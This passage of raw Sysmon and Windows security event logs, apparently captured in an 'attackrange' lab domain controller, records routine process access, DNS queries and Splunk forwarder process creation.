Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x43aa3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.969\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.969","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.969\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.969","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2371,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.016\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.016","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2372,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.594\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.594","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2373,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.719\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nProcessId: 1224\r\nQueryName: wpad\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.719","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","QueryName":"wpad","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2374,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.737\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nProcessId: 2748\r\nQueryName: win-dc-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.737","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001066B80200}","QueryName":"win-dc-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:59.849\r\nProcessGuid: {A837DB8D-01D3-5F25-0000-0010E0390400}\r\nProcessId: 3316\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:59.849","ProcessGuid":"{A837DB8D-01D3-5F25-0000-0010E0390400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01D3-5F25-0000-0010E0390400}\r\nTargetProcessId: 3316\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01D3-5F25-0000-0010E0390400}","TargetProcessId":"3316","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01D3-5F25-0000-0010E0390400}\r\nTargetProcessId: 3316\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01D3-5F25-0000-0010E0390400}","TargetProcessId":"3316","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 